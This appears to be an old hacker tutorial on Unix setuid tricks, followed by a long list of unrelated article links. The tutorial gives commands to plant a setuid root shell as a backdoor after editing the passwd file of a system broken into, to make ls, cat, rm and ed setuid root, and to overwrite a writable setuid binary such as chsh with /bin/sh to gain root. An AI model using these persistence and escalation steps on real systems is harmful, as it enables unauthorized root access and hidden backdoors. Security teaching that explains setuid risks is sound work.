Set The User ID
-------------------

This is porbably one of the most used schemes. Setting up an "UID-
Shell". What does this mean? Well, it basically means you are going
to set the user-bit on a program. The program most commonly used is
a shell (csh,sh, ksh, etc). Why? Think about it: You'll have access
to whatever the owner of the file does. A UID shell sets the user-ID of
the person who executes it to the owner of the program. So if root
owns a uid shell, then you become root when you run it. This is an
alternate way to become root.

Say you get in and modify the passwd file and make a root level
account unpassworded, so you can drop in. Of course, you almost HAVE to
get rid of that account or else it WILL be noticed eventually. So, what
you would do is set up a regular user account for yourself, then, make
a uid shell. Usually you would use /bin/sh to do it. After adding
the regular user to the passwd file, and setting up his home directory,
you could do something like this:
(assume you set up the account: shk)
# cp /bin/sh /usr/shk/runme
# chmod a+s /usr/shk/runme

Thats all there would be to it. When you logged in as shk, you could just
type in:

$ runme
#

See? You'd then be root. Here is a thing to do:

$ id
uid=104(shk) gid=50(user)

$ runme
# id
uid=104(shk) gid=50(user) euid=0(root)
#

The euid is the "effective" user ID. UID-shells only set the effective
userid, not the real user-id. But, the effective user id over-rides the
real user id. Now, you can, if you wanted to just be annoying, make
the utilities suid to root. What do I mean? For instance, make 'ls'
a root 'shell'. :

# chmod a+s /bin/ls
# exit
$ ls -l /usr/fred
..
......
etc crap

Ls would then be able to pry into ANY directory. If you did the same to
"cat" you could view any file. If you did it to rm, you could delete any
file. If you did it to 'ed', you could edit any-file (nifty!), anywhere on
the system (usually).

How do I get root?
------------------

Good question indeed. To make a program set the user-id shell to root,
you have to be root, unless you're lucky. What do I mean? Well, say
you find a program that sets the user-id to root. If you have access
to write to that file, guess what? you can copy over it, but keep
the uid bit set. So, say you see that the program chsh is setting
the user id too root. You can copy /bin/sh over it.

$ ls -l
rwsrwsrws root other 10999 Jan 4 chsh
$ cp /bin/sh chsh
$ chsh
#

See? That is just one way. There are others, which I will now talk
about.

More on setting the UID
-----------------------

Now, the generic form for making a program set the User-ID bit
is to use this command:

chmod a+s file

Where 'file' is a valid existing file. Now, only those who own the file
can set the user ID bit. Remember, anything YOU create, YOU own, so if
you copy th /bin/sh, the one you are logged in as owns it, or IF the
UID is set to something else, the New UID owns the file. This brings
me to BAD file permissions.

Cyber Avans

Assembling Your Cisco Home Lab

Technology and Wireless Satellite Internet

Choosing a Video Game System

OST to PST convertor

Beginner's Final Fantasy XI Gil Guide

Configuring And Troubleshooting Router-On-A-Stick

Encarta Premium 2006

The Convenience Of An All In One Printer

What is Blogging??

I Know What Color You Are

Utilizing Online Printing Service

Beware - Borders and Boundaries

Recover Damaged Mail and Data in Microsoft Outlook

Recover Deleted Excel Spreadsheets

Cisco CCNP - BCMSN Exam Tutorial: Spanning Tree Protocol (STP) Timers

Should We Have An External Back Up

Who Plays World Of Warcraft

Video Game Violence

Finding Your MAC Address On Wired And Wireless Network Cards

Cisco CCNP - BSCI Certification: The BGP Attribute "MED"

Game and Movie For PSP-Where To Get Them for Free

ZIP repair software tool

Peltier Associates Breaking and Fixing Wireless Security

Four Important Commands For Your CCNA - CCNP Home Lab

A Flashback from Way Back

Disk Recovery Wizard

Podcasting For Profit

Cisco CCNP - BCMSN Exam Tutorial: Static VLANs

There's no mystery in the IP address!

Video On Demand Adult Films

Fiber Optics In The Real World

Best Web Hosting - How Can It Affect Your Business

How to Set POP 3 EMAIL on Outlook Express

how to run doom with tweeks

Can't See Secure Sites

Downloading Windows Media Streams

Bit Torrent Tutorials

Backtracking EMAIL Messages

How To Stop Spam

Downloading Windows Media Streams

Getting Counter-Strike Source to work

Firefox Tweeks

Bit Torrent Tutorials II

Bit Torrent Tutorials

Backtracking EMAIL Messages

All About Movie Tags (what Is A Dvdrip, Cam Etc.) IV

All About Movie Tags (what Is A Dvdrip, Cam Etc.) Part III

All About Movie Tags (what Is A Dvdrip, Cam Etc.) Part II

All About Movie Tags (what Is A Dvdrip, Cam Etc.)

HOW TO BLOCK PEOPLE ON WINMX WHO SHARE NOTHING

How To Add A Url Address Bar To The Taskbar

Downloading Files, Using Archives And Images

A Web Standards Checklist, How to make a proper website

Email Forge, sends email from anyone

Get unlimited bandwidth from your host for free

Windows XP Startup and Performance Tweaks

Dos User No Boot

Delete Undeletable File

Google secrets

Utilizing search engines

How To Get Top Ranking Search Engines

etc.. and start with

and then move to

etc..

How to Install and run Windows CE on your USB Stick

How To Boot Xp Faster (updated)

How To Access Your Folders From Your Taskbar

How do I remove an extra operating system from by

How to modify *.exe files

How To Make XP Go Faster

HOW TO GET ANY WINDOWS PASSWORD

UNIX :HACKING III " Bad Directory Permissions"

UNIX : A Hacking Tutorial part II

etc..
and start with